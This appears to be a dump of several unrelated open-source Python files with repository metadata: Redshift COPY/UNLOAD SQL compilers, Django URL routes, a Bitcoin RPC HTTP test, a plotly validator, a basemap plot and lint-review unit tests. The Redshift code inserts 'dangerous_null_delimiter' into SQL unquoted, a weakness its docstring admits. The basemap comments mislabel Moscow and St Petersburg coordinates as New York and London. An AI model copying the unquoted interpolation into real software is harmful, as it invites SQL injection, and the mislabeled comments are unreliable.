aws_account_id=aws_account_id,
iam_role_name=iam_role_name,
)
self.select = select
self.unload_location = unload_location
self.credentials = credentials
self.manifest = manifest
self.delimiter = delimiter
self.fixed_width = fixed_width
self.encrypted = encrypted
self.gzip = gzip
self.add_quotes = add_quotes
self.null = null
self.escape = escape
self.allow_overwrite = allow_overwrite
self.parallel = parallel
@sa_compiler.compiles(UnloadFromSelect)
def visit_unload_from_select(element, compiler, **kw):
"""Returns the actual sql query for the UnloadFromSelect class."""
template = """
UNLOAD (:select) TO :unload_location
CREDENTIALS :credentials
{manifest}
{delimiter}
{encrypted}
{fixed_width}
{gzip}
{add_quotes}
{null}
{escape}
{allow_overwrite}
{parallel}
"""
el = element
qs = template.format(
manifest='MANIFEST' if el.manifest else '',
delimiter=(
'DELIMITER AS :delimiter' if el.delimiter is not None else ''
),
encrypted='ENCRYPTED' if el.encrypted else '',
fixed_width='FIXEDWIDTH AS :fixed_width' if el.fixed_width else '',
gzip='GZIP' if el.gzip else '',
add_quotes='ADDQUOTES' if el.add_quotes else '',
escape='ESCAPE' if el.escape else '',
null='NULL AS :null_as' if el.null is not None else '',
allow_overwrite='ALLOWOVERWRITE' if el.allow_overwrite else '',
parallel='PARALLEL OFF' if not el.parallel else '',
)
query = sa.text(qs)
if el.delimiter is not None:
query = query.bindparams(sa.bindparam(
'delimiter', value=element.delimiter, type_=sa.String,
))
if el.fixed_width:
query = query.bindparams(sa.bindparam(
'fixed_width',
value=_process_fixed_width(el.fixed_width),
type_=sa.String,
))
if el.null is not None:
query = query.bindparams(sa.bindparam(
'null_as', value=el.null, type_=sa.String
))
return compiler.process(
query.bindparams(
sa.bindparam('credentials', value=el.credentials, type_=sa.String),
sa.bindparam(
'unload_location', value=el.unload_location, type_=sa.String,
),
sa.bindparam(
'select',
value=compiler.process(
el.select,
literal_binds=True,
),
type_=sa.String,
),
),
**kw
)
class CopyCommand(_ExecutableClause):
"""
Prepares a Redshift COPY statement.
Parameters
----------
to : sqlalchemy.Table or iterable of sqlalchemy.ColumnElement
The table or columns to copy data into
data_location : str
The Amazon S3 location from where to copy, or a manifest file if
the `manifest` option is used
access_key_id: str, optional
Access Key. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
secret_access_key: str, optional
Secret Access Key ID. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
session_token : str, optional
aws_account_id: str, optional
AWS account ID for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
iam_role_name: str, optional
IAM role name for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
format : str, optional
CSV, JSON, or AVRO. Indicates the type of file to copy from
quote : str, optional
Specifies the character to be used as the quote character when using
``format='CSV'``. The default is a double quotation mark ( ``"`` )
delimiter : File delimiter, optional
defaults to ``|``
path_file : str, optional
Specifies an Amazon S3 location to a JSONPaths file to explicitly map
Avro or JSON data elements to columns.
defaults to ``'auto'``
fixed_width: iterable of (str, int), optional
List of (column name, length) pairs to control fixed-width output.
compression : str, optional
GZIP, LZOP, indicates the type of compression of the file to copy
accept_any_date : bool, optional
Allows any date format, including invalid formats such as
``00/00/00 00:00:00``, to be loaded as NULL without generating an error
defaults to False
accept_inv_chars : str, optional
Enables loading of data into VARCHAR columns even if the data contains
invalid UTF-8 characters. When specified each invalid UTF-8 byte is
replaced by the specified replacement character
blanks_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with whitespace
only values as NULL instead of whitespace
date_format : str, optional
Specified the date format. If you want Amazon Redshift to automatically
recognize and convert the date format in your source data, specify
``'auto'``
empty_as_null : bool, optional
Boolean value denoting whether to load VARCHAR fields with empty
values as NULL instead of empty string
encoding : str, optional
``'UTF8'``, ``'UTF16'``, ``'UTF16LE'``, ``'UTF16BE'``. Specifies the
encoding type of the load data
defaults to ``'UTF8'``
escape : bool, optional
When this parameter is specified, the backslash character (``\``) in
input data is treated as an escape character. The character that
immediately follows the backslash character is loaded into the table
as part of the current column value, even if it is a character that
normally serves a special purpose
explicit_ids : bool, optional
Override the autogenerated IDENTITY column values with explicit values
from the source data files for the tables
fill_record : bool, optional
Allows data files to be loaded when contiguous columns are missing at
the end of some of the records. The missing columns are filled with
either zero-length strings or NULLs, as appropriate for the data types
of the columns in question.
ignore_blank_lines : bool, optional
Ignores blank lines that only contain a line feed in a data file and
does not try to load them
ignore_header : int, optional
Integer value of number of lines to skip at the start of each file
dangerous_null_delimiter : str, optional
Optional string value denoting what to interpret as a NULL value from
the file. Note that this parameter *is not properly quoted* due to a
difference between redshift's and postgres's COPY commands
interpretation of strings. For example, null bytes must be passed to
redshift's ``NULL`` verbatim as ``'\\0'`` whereas postgres's ``NULL``
accepts ``'\\x00'``.
remove_quotes : bool, optional
Removes surrounding quotation marks from strings in the incoming data.
All characters within the quotation marks, including delimiters, are
retained.
roundec : bool, optional
Rounds up numeric values when the scale of the input value is greater
than the scale of the column
time_format : str, optional
Specified the date format. If you want Amazon Redshift to automatically
recognize and convert the time format in your source data, specify
``'auto'``
trim_blanks : bool, optional
Removes the trailing white space characters from a VARCHAR string
truncate_columns : bool, optional
Truncates data in columns to the appropriate number of characters so
that it fits the column specification
comp_rows : int, optional
Specifies the number of rows to be used as the sample size for
compression analysis
comp_update : bool, optional
Controls whether compression encodings are automatically applied.
If omitted or None, COPY applies automatic compression only if the
target table is empty and all the table columns either have RAW
encoding or no encoding.
If True COPY applies automatic compression if the table is empty, even
if the table columns already have encodings other than RAW.
If False automatic compression is disabled
max_error : int, optional
If the load returns the ``max_error`` number of errors or greater, the
load fails
defaults to 100000
no_load : bool, optional
Checks the validity of the data file without actually loading the data
stat_update : bool, optional
Update statistics automatically regardless of whether the table is
initially empty
manifest : bool, optional
Boolean value denoting whether data_location is a manifest file.
"""
formats = ['CSV', 'JSON', 'AVRO', None]
compression_types = ['GZIP', 'LZOP']
def __init__(self, to, data_location, access_key_id=None,
secret_access_key=None, session_token=None,
aws_account_id=None, iam_role_name=None,
format=None, quote=None,
path_file='auto', delimiter=None, fixed_width=None,
compression=None, accept_any_date=False,
accept_inv_chars=None, blanks_as_null=False, date_format=None,
empty_as_null=False, encoding=None, escape=False,
explicit_ids=False, fill_record=False,
ignore_blank_lines=False, ignore_header=None,
dangerous_null_delimiter=None, remove_quotes=False,
roundec=False, time_format=None, trim_blanks=False,
truncate_columns=False, comp_rows=None, comp_update=None,
max_error=None, no_load=False, stat_update=None,
manifest=False):
credentials = _process_aws_credentials(
access_key_id=access_key_id,
secret_access_key=secret_access_key,
session_token=session_token,
aws_account_id=aws_account_id,
iam_role_name=iam_role_name,
)
if delimiter is not None and len(delimiter) != 1:
raise ValueError('"delimiter" parameter must be a single '
'character')
if ignore_header is not None:
if not isinstance(ignore_header, numbers.Integral):
raise TypeError(
'"ignore_header" parameter should be an integer'
)
if format not in self.formats:
raise ValueError('"format" parameter must be one of %s' %
self.formats)
if compression is not None:
if compression not in self.compression_types:
raise ValueError(
'"compression" parameter must be one of %s' %
self.compression_types
)
table = None
columns = []
if isinstance(to, collections.Iterable):
for column in to:
if table is not None and table != column.table:
raise ValueError(
'All columns must come from the same table: '
'%s comes from %s not %s' % (
column, column.table, table
),
)
columns.append(column)
table = column.table
else:
table = to
self.table = table
self.columns = columns
self.data_location = data_location
self.credentials = credentials
self.format = format
self.quote = quote
self.path_file = path_file
self.delimiter = delimiter
self.fixed_width = fixed_width
self.compression = compression
self.manifest = manifest
self.accept_any_date = accept_any_date
self.accept_inv_chars = accept_inv_chars
self.blanks_as_null = blanks_as_null
self.date_format = date_format
self.empty_as_null = empty_as_null
self.encoding = encoding
self.escape = escape
self.explicit_ids = explicit_ids
self.fill_record = fill_record
self.ignore_blank_lines = ignore_blank_lines
self.ignore_header = ignore_header
self.dangerous_null_delimiter = dangerous_null_delimiter
self.remove_quotes = remove_quotes
self.roundec = roundec
self.time_format = time_format
self.trim_blanks = trim_blanks
self.truncate_columns = truncate_columns
self.comp_rows = comp_rows
self.comp_update = comp_update
self.max_error = max_error
self.no_load = no_load
self.stat_update = stat_update
@sa_compiler.compiles(CopyCommand)
def visit_copy_command(element, compiler, **kw):
"""
Returns the actual sql query for the CopyCommand class.
"""
qs = """COPY {table}{columns} FROM :data_location
WITH CREDENTIALS AS :credentials
{format}
{parameters}"""
parameters = []
bindparams = [
sa.bindparam(
'data_location',
value=element.data_location,
type_=sa.String,
),
sa.bindparam(
'credentials',
value=element.credentials,
type_=sa.String,
),
]
if element.format == 'CSV':
format_ = 'FORMAT AS CSV'
if element.quote is not None:
format_ += ' QUOTE AS :quote_character'
bindparams.append(sa.bindparam(
'quote_character',
value=element.quote,
type_=sa.String,
))
elif element.format == 'JSON':
format_ = 'FORMAT AS JSON AS :json_option'
bindparams.append(sa.bindparam(
'json_option',
value=element.path_file,
type_=sa.String,
))
elif element.format == 'AVRO':
format_ = 'FORMAT AS AVRO AS :avro_option'
bindparams.append(sa.bindparam(
'avro_option',
value=element.path_file,
type_=sa.String,
))
else:
format_ = ''
if element.delimiter is not None:
parameters.append('DELIMITER AS :delimiter_char')
bindparams.append(sa.bindparam(
'delimiter_char',
value=element.delimiter,
type_=sa.String,
))
if element.fixed_width is not None:
parameters.append('FIXEDWIDTH AS :fixedwidth_spec')
bindparams.append(sa.bindparam(
'fixedwidth_spec',
value=_process_fixed_width(element.fixed_width),
type_=sa.String,
))
if element.compression in ['GZIP', 'LZOP']:
parameters.append(element.compression)
if element.manifest:
parameters.append('MANIFEST')
if element.accept_any_date:
parameters.append('ACCEPTANYDATE')
if element.accept_inv_chars is not None:
parameters.append('ACCEPTINVCHARS AS :replacement_char')
bindparams.append(sa.bindparam(
'replacement_char',
value=element.accept_inv_chars,
type_=sa.String
))
if element.blanks_as_null:
parameters.append('BLANKSASNULL')
if element.date_format is not None:
parameters.append('DATEFORMAT AS :dateformat_string')
bindparams.append(sa.bindparam(
'dateformat_string',
value=element.date_format,
type_=sa.String,
))
if element.empty_as_null:
parameters.append('EMPTYASNULL')
if element.encoding in ['UTF8', 'UTF16', 'UTF16LE', 'UTF16BE']:
parameters.append('ENCODING AS ' + element.encoding)
if element.escape:
parameters.append('ESCAPE')
if element.explicit_ids:
parameters.append('EXPLICIT_IDS')
if element.fill_record:
parameters.append('FILLRECORD')
if element.ignore_blank_lines:
parameters.append('IGNOREBLANKLINES')
if element.ignore_header is not None:
parameters.append('IGNOREHEADER AS :number_rows')
bindparams.append(sa.bindparam(
'number_rows',
value=element.ignore_header,
type_=sa.Integer,
))
if element.dangerous_null_delimiter is not None:
parameters.append("NULL AS '%s'" % element.dangerous_null_delimiter)
if element.remove_quotes:
parameters.append('REMOVEQUOTES')
if element.roundec:
parameters.append('ROUNDEC')
if element.time_format is not None:
parameters.append('TIMEFORMAT AS :timeformat_string')
bindparams.append(sa.bindparam(
'timeformat_string',
value=element.time_format,
type_=sa.String,
))
if element.trim_blanks:
parameters.append('TRIMBLANKS')
if element.truncate_columns:
parameters.append('TRUNCATECOLUMNS')
if element.comp_rows:
parameters.append('COMPROWS :numrows')
bindparams.append(sa.bindparam(
'numrows',
value=element.comp_rows,
type_=sa.Integer,
))
if element.comp_update:
parameters.append('COMPUPDATE ON')
elif element.comp_update is not None:
parameters.append('COMPUPDATE OFF')
if element.max_error is not None:
parameters.append('MAXERROR AS :error_count')
bindparams.append(sa.bindparam(
'error_count',
value=element.max_error,
type_=sa.Integer,
))
if element.no_load:
parameters.append('NOLOAD')
if element.stat_update:
parameters.append('STATUPDATE ON')
elif element.stat_update is not None:
parameters.append('STATUPDATE OFF')
columns = ' (%s)' % ', '.join(
compiler.preparer.format_column(column) for column in element.columns
) if element.columns else ''
qs = qs.format(
table=compiler.preparer.format_table(element.table),
columns=columns,
format=format_,
parameters='\n'.join(parameters)
)
return compiler.process(sa.text(qs).bindparams(*bindparams), **kw)
|
solackerman/sqlalchemy-redshift
|
sqlalchemy_redshift/commands.py
|
Python
|
mit
| 25,418
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^signin/', views.signin, name='signin'),
url(r'^signout/', views.signout, name='signout'),
url(r'^change_password/', views.change_password, name='change_password'),
]
|
wasit7/visionmarker
|
beta/wl_auth/urls.py
|
Python
|
mit
| 244
|
#!/usr/bin/env python3
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Copyright (c) 2015-2017 The Bitcoin Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
#
# Test rpc http basics
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import http.client
import urllib.parse
class HTTPBasicsTest (BitcoinTestFramework):
def setup_nodes(self):
return start_nodes(4, self.options.tmpdir)
def run_test(self):
#################################################
# lowlevel check for http persistent connection #
#################################################
url = urllib.parse.urlparse(self.nodes[0].url)
authpair = url.username + ':' + url.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#same should be if we add keep-alive because this should be the std. behaviour
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection": "keep-alive"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
#send 2nd request without closing connection
conn.request('POST', '/', '{"method": "getchaintips"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1) #must also response with a correct json-rpc message
assert(conn.sock!=None) #according to http/1.1 connection must still be open!
conn.close()
#now do the same with "Connection: close"
headers = {"Authorization": "Basic " + str_to_b64str(authpair), "Connection":"close"}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock==None) #now the connection must be closed after the response
#node1 (2nd node) is running with disabled keep-alive option
urlNode1 = urllib.parse.urlparse(self.nodes[1].url)
authpair = urlNode1.username + ':' + urlNode1.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode1.hostname, urlNode1.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
#node2 (third node) is running with standard keep-alive parameters which means keep-alive is on
urlNode2 = urllib.parse.urlparse(self.nodes[2].url)
authpair = urlNode2.username + ':' + urlNode2.password
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
out1 = conn.getresponse().read()
assert(b'"error":null' in out1)
assert(conn.sock!=None) #connection must be closed because bitcoind should use keep-alive by default
# Check excessive request size
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*1000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.NOT_FOUND)
conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)
conn.connect()
conn.request('GET', '/' + ('x'*10000), '', headers)
out1 = conn.getresponse()
assert_equal(out1.status, http.client.BAD_REQUEST)
if __name__ == '__main__':
HTTPBasicsTest ().main ()
|
BitcoinUnlimited/BitcoinUnlimited
|
qa/rpc-tests/httpbasics.py
|
Python
|
mit
| 4,832
|
import _plotly_utils.basevalidators
class XValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="x", parent_name="isosurface.caps", **kwargs):
super(XValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "X"),
data_docs=kwargs.pop(
"data_docs",
"""
fill
Sets the fill ratio of the `caps`. The default
fill value of the `caps` is 1 meaning that they
are entirely shaded. On the other hand Applying
a `fill` ratio less than one would allow the
creation of openings parallel to the edges.
show
Sets the fill ratio of the `slices`. The
default fill value of the x `slices` is 1
meaning that they are entirely shaded. On the
other hand Applying a `fill` ratio less than
one would allow the creation of openings
parallel to the edges.
""",
),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/isosurface/caps/_x.py
|
Python
|
mit
| 1,178
|
# -*- coding: utf-8 -*-
# http://matplotlib.org/basemap/users/examples.html
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# create new figure, axes instances.
fig=plt.figure()
ax=fig.add_axes([0.1,0.1,0.8,0.8])
# setup mercator map projection.
m = Basemap(llcrnrlon=0.,llcrnrlat=20.,urcrnrlon=80.,urcrnrlat=70.,\
rsphere=(6378137.00,6356752.3142),\
resolution='l',projection='merc',\
lat_0=55.,lon_0=37.,lat_ts=20.)
# nylat, nylon are lat/lon of New York
nylat = 55.7522200; nylon = 37.6155600
# lonlat, lonlon are lat/lon of London.
lonlat = 59.9386300; lonlon = 30.3141300
# draw great circle route between NY and London
m.drawgreatcircle(nylon,nylat,lonlon,lonlat,linewidth=2,color='b')
m.drawcoastlines()
m.fillcontinents()
# draw parallels
m.drawparallels(np.arange(-20,0,20),labels=[1,1,0,1])
# draw meridians
m.drawmeridians(np.arange(-180,180,30),labels=[1,1,0,1])
ax.set_title('Great Circle from New York to London')
plt.show()
|
sergeimoiseev/othodi_code
|
old/mpl_msk_spb.py
|
Python
|
mit
| 1,018
|
# volunteers/urls.py
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from volunteers.views import *
urlpatterns = patterns('',
#(r'^$', login_required(ShowsInProcessing.as_view()), {}, 'volunteer_show_list'),
#(r'^(?P<show_slug>\[-\w]+)/$', login_required(ShowReview.as_view()), {}, 'volunteer_show_review'),
(r'^more_videos/(?P<episode_id>\d+)/(?P<slop>\d+)/$', login_required(ExpandCutList.as_view()), {}, 'volunteer_expand_cutlist'),
(r'^more_videos/(?P<episode_id>\d+)/(?P<slop>\d+)/(?P<edit_key>\w+)/$', ExpandCutList.as_view(), {}, 'guest_expand_cutlist'),
(r'^reopen/(?P<episode_id>\d+)/$', login_required(ReopenEpisode.as_view()), {}, 'volunteer_reopen'),
(r'^reopen/(?P<episode_id>\d+)/(?P<edit_key>\w+)/$', ReopenEpisode.as_view(), {}, 'guest_reopen'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/$', login_required(EpisodeReview.as_view()), {}, 'volunteer_episode_review'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/(?P<edit_key>\w+)/$', EpisodeReview.as_view(), {}, 'guest_episode_review'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/$', login_required(EpisodeReview.as_view()), {'advanced': True}, 'volunteer_episode_review_advanced'),
(r'^(?P<show_slug>[-\w]+)/(?P<episode_slug>[-\w]+)/(?P<edit_key>\w+)/$', EpisodeReview.as_view(), {'advanced': True}, 'guest_episode_review_advanced'),
)
|
EricSchles/veyepar
|
dj/volunteers/urls.py
|
Python
|
mit
| 1,412
|
from . import load_fixture
from lintreview.config import load_config
from lintreview.diff import DiffCollection
from lintreview.review import Review, Problems, Comment
from lintreview.repo import GithubRepository, GithubPullRequest
from mock import Mock, call
from nose.tools import eq_
from github3.issues.comment import IssueComment as GhIssueComment
from github3.pulls import PullFile
from unittest import TestCase
import json
config = load_config()
class TestReview(TestCase):
def setUp(self):
repo = Mock(spec=GithubRepository)
pr = Mock(spec=GithubPullRequest,
head='abc123',
display_name='markstory/lint-review#1',
number=2)
repo.pull_request.return_value = pr
self.repo, self.pr = repo, pr
self.review = Review(repo, pr)
def test_load_comments__none_active(self):
fixture_data = load_fixture('comments_none_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
review = Review(self.repo, self.pr)
review.load_comments()
eq_(0, len(review.comments("View/Helper/AssetCompressHelper.php")))
def test_load_comments__loads_comments(self):
fixture_data = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
review = Review(self.repo, self.pr)
review.load_comments()
filename = "Routing/Filter/AssetCompressor.php"
res = review.comments(filename)
eq_(1, len(res))
expected = Comment(filename, None, 87, "A pithy remark")
eq_(expected, res[0])
filename = "View/Helper/AssetCompressHelper.php"
res = review.comments(filename)
eq_(2, len(res))
expected = Comment(filename, None, 40, "Some witty comment.")
eq_(expected, res[0])
expected = Comment(filename, None, 89, "Not such a good comment")
eq_(expected, res[1])
def test_filter_existing__removes_duplicates(self):
fixture_data = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture_data))
problems = Problems()
review = Review(self.repo, self.pr)
filename_1 = "Routing/Filter/AssetCompressor.php"
filename_2 = "View/Helper/AssetCompressHelper.php"
problems.add(filename_1, 87, 'A pithy remark')
problems.add(filename_1, 87, 'Something different')
problems.add(filename_2, 88, 'I <3 it')
problems.add(filename_2, 89, 'Not such a good comment')
review.load_comments()
review.remove_existing(problems)
res = problems.all(filename_1)
eq_(1, len(res))
expected = Comment(filename_1,
87,
87,
'A pithy remark\nSomething different')
eq_(res[0], expected)
res = problems.all(filename_2)
eq_(1, len(res))
expected = Comment(filename_2, 88, 88, 'I <3 it')
eq_(res[0], expected)
def test_publish_problems(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
sha = 'abc123'
review = Review(self.repo, self.pr)
review.publish_problems(problems, sha)
assert self.pr.create_review_comment.called
eq_(2, self.pr.create_review_comment.call_count)
assert_review_comments_created(
self.pr.create_review_comment.call_args_list,
errors,
sha)
def test_publish_status__ok_no_comment_label_or_status(self):
config = {
'OK_COMMENT': None,
'OK_LABEL': None,
'PULLREQUEST_STATUS': False,
}
review = Review(self.repo, self.pr, config)
review.publish_status(0)
assert not self.repo.create_status.called, 'Create status called'
assert not self.pr.create_comment.called, 'Comment not created'
assert not self.pr.add_label.called, 'Label added created'
def test_publish_status__ok_with_comment_label_and_status(self):
config = {
'OK_COMMENT': 'Great job!',
'OK_LABEL': 'No lint errors',
'PULLREQUEST_STATUS': True,
}
review = Review(self.repo, self.pr, config)
review.publish_status(0)
assert self.repo.create_status.called, 'Create status not called'
self.repo.create_status.assert_called_with(
self.pr.head,
'success',
'No lint errors found.')
assert self.pr.create_comment.called, 'Issue comment created'
self.pr.create_comment.assert_called_with('Great job!')
assert self.pr.add_label.called, 'Label added created'
self.pr.add_label.assert_called_with('No lint errors')
def test_publish_status__has_errors(self):
config = {
'OK_COMMENT': 'Great job!',
'OK_LABEL': 'No lint errors',
'APP_NAME': 'custom-name'
}
review = Review(self.repo, self.pr, config)
review.publish_status(1)
assert self.repo.create_status.called, 'Create status not called'
self.repo.create_status.assert_called_with(
self.pr.head,
'failure',
'Lint errors found, see pull request comments.')
assert not self.pr.create_comment.called, 'Comment not created'
assert not self.pr.add_label.called, 'Label added created'
def test_publish_problems_remove_ok_label(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
sha = 'abc123'
config = {'OK_LABEL': 'No lint'}
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish_problems(problems, sha)
assert self.pr.remove_label.called, 'Label should be removed'
assert self.pr.create_review_comment.called, 'Comments should be added'
eq_(2, self.pr.create_review_comment.call_count)
self.pr.remove_label.assert_called_with(config['OK_LABEL'])
assert_review_comments_created(
self.pr.create_review_comment.call_args_list,
errors,
sha)
def test_publish_empty_comment(self):
problems = Problems(changes=[])
review = Review(self.repo, self.pr)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'Should create a comment'
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.pr.create_comment.assert_called_with(msg)
def test_publish_empty_comment_add_ok_label(self):
problems = Problems(changes=[])
config = {'OK_LABEL': 'No lint'}
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'ok comment should be added.'
assert self.pr.remove_label.called, 'label should be removed.'
self.pr.remove_label.assert_called_with(config['OK_LABEL'])
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.pr.create_comment.assert_called_with(msg)
def test_publish_empty_comment_with_comment_status(self):
config = {
'PULLREQUEST_STATUS': True,
}
problems = Problems(changes=[])
review = Review(self.repo, self.pr, config)
sha = 'abc123'
review.publish(problems, sha)
assert self.pr.create_comment.called, 'Should create a comment'
msg = ('Could not review pull request. '
'It may be too large, or contain no reviewable changes.')
self.repo.create_status.assert_called_with(
self.pr.head,
'error',
msg)
self.pr.create_comment.assert_called_with(msg)
def test_publish_comment_threshold_checks(self):
fixture = load_fixture('comments_current.json')
self.pr.review_comments.return_value = map(
lambda f: GhIssueComment(f),
json.loads(fixture))
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
problems.set_changes([1])
sha = 'abc123'
review = Review(self.repo, self.pr)
review.publish_summary = Mock()
review.publish(problems, sha, 1)
assert review.publish_summary.called, 'Should have been called.'
def test_publish_summary(self):
problems = Problems()
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something bad'),
)
problems.add_many(errors)
problems.set_changes([1])
review = Review(self.repo, self.pr)
review.publish_summary(problems)
assert self.pr.create_comment.called
eq_(1, self.pr.create_comment.call_count)
msg = """There are 2 errors:
* Console/Command/Task/AssetBuildTask.php, line 117 - Something bad
* Console/Command/Task/AssetBuildTask.php, line 119 - Something bad
"""
self.pr.create_comment.assert_called_with(msg)
class TestProblems(TestCase):
two_files_json = load_fixture('two_file_pull_request.json')
# Block offset so lines don't match offsets
block_offset = load_fixture('pull_request_line_offset.json')
def setUp(self):
self.problems = Problems()
def test_add(self):
self.problems.add('file.py', 10, 'Not good')
for item in self.problems:
print item
eq_(1, len(self.problems))
self.problems.add('file.py', 11, 'Not good')
eq_(2, len(self.problems))
eq_(2, len(self.problems.all()))
eq_(2, len(self.problems.all('file.py')))
eq_(0, len(self.problems.all('not there')))
def test_add__duplicate_is_ignored(self):
self.problems.add('file.py', 10, 'Not good')
eq_(1, len(self.problems))
self.problems.add('file.py', 10, 'Not good')
eq_(1, len(self.problems))
def test_add__same_line_combines(self):
self.problems.add('file.py', 10, 'Tabs bad')
self.problems.add('file.py', 10, 'Spaces are good')
eq_(1, len(self.problems))
result = self.problems.all()
expected = 'Tabs bad\nSpaces are good'
eq_(expected, result[0].body)
def test_add__same_line_ignores_duplicates(self):
self.problems.add('file.py', 10, 'Tabs bad')
self.problems.add('file.py', 10, 'Tabs bad')
eq_(1, len(self.problems))
result = self.problems.all()
expected = 'Tabs bad'
eq_(expected, result[0].body)
def test_add__with_base_path(self):
problems = Problems('/some/path/')
problems.add('/some/path/file.py', 10, 'Not good')
eq_([], problems.all('/some/path/file.py'))
eq_(1, len(problems.all('file.py')))
eq_(1, len(problems))
def test_add__with_base_path_no_trailing_slash(self):
problems = Problems('/some/path')
problems.add('/some/path/file.py', 10, 'Not good')
eq_([], problems.all('/some/path/file.py'))
eq_(1, len(problems.all('file.py')))
eq_(1, len(problems))
def test_add__with_diff_containing_block_offset(self):
res = map(lambda f: PullFile(f),
json.loads(self.block_offset))
changes = DiffCollection(res)
problems = Problems(changes=changes)
line_num = 32
problems.add('somefile.py', line_num, 'Not good')
eq_(1, len(problems))
result = problems.all('somefile.py')
eq_(changes.line_position('somefile.py', line_num), result[0].position,
'Offset should be transformed to match value in changes')
def test_add_many(self):
errors = [
('some/file.py', 10, 'Thing is wrong'),
('some/file.py', 12, 'Not good'),
]
self.problems.add_many(errors)
result = self.problems.all('some/file.py')
eq_(2, len(result))
expected = [
Comment(errors[0][0], errors[0][1], errors[0][1], errors[0][2]),
Comment(errors[1][0], errors[1][1], errors[1][1], errors[1][2]),
]
eq_(expected, result)
def test_limit_to_changes__remove_problems(self):
res = map(lambda f: PullFile(f),
json.loads(self.two_files_json))
changes = DiffCollection(res)
# Setup some fake problems.
filename_1 = 'Console/Command/Task/AssetBuildTask.php'
errors = (
(None, None, 'This is a general comment'),
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something else bad'),
(filename_1, 130, 'Filtered out, as line is not changed'),
)
self.problems.add_many(errors)
filename_2 = 'Test/test_files/View/Parse/single.ctp'
errors = (
(filename_2, 2, 'Filtered out'),
(filename_2, 3, 'Something bad'),
(filename_2, 7, 'Filtered out'),
)
self.problems.add_many(errors)
self.problems.set_changes(changes)
self.problems.limit_to_changes()
result = self.problems.all(filename_1)
eq_(2, len(result))
expected = [
(None, None, 'This is a general comment'),
(filename_1, 117, 'Something bad'),
(filename_1, 119, 'Something else bad')]
eq_(result.sort(), expected.sort())
result = self.problems.all(filename_2)
eq_(1, len(result))
expected = [
Comment(filename_2, 3, 3, 'Something bad')
]
eq_(result, expected)
def test_has_changes(self):
problems = Problems(changes=None)
self.assertFalse(problems.has_changes())
problems = Problems(changes=[1])
assert problems.has_changes()
